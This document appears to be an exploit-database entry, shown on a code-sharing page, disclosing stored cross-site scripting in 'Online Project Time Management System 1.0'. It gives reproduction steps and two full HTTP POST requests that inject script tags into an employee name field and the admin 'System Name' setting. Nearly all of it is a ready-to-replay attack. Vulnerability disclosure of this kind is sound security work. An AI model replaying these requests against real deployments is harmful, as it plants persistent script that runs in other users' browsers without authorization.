扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 |
# Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated) # Date: 19/01/2022 # Exploit Author: Felipe Alcantara (Filiplain) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Kali Linux # Description: Stored XSS in multiple fields... # Steps to reproduce (with employee Access) # Log in as an employee # Go to : http://localhost/ptms/?page=user # Add XSS payload to any field of the user's name. #Click Update ================= POST /ptms/classes/Users.php?f=save_employee HTTP/1.1 Host: localhost Content-Length: 1339 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak Origin: http://localhost Referer: http://localhost/ptms/?page=user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm Connection: close ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="id" 4 ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="code" 2022-0003 ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="generated_password" ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="firstname" Mark ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="middlename" <script>alert("XSS_TEST")</script> ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="lastname" Cooper ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="gender" Male ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="department" IT Department ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="position" Department Manager ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="email" mcooper@sample.com ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="password" ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryvsLkAfaBC64Uzoak-- ================= ----------------------------------------------------------------------------- # Steps to reproduce (with Admin access) # Log in to the admin panel # Go to : http://localhost/ptms/admin/?page=system_info # Add XSS payload to the 'System Name' field #Click Update ================= POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost Content-Length: 603 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq Origin: http://localhost Referer: http://localhost/ptms/admin/?page=system_info Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm Connection: close ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="name" Online Project Time Management System - PHP <script>alert("XSS")</script> ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="short_name" PTMS - PHP ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="cover"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryCibB6pEzThjb4Zcq-- ================= |
体验盒子
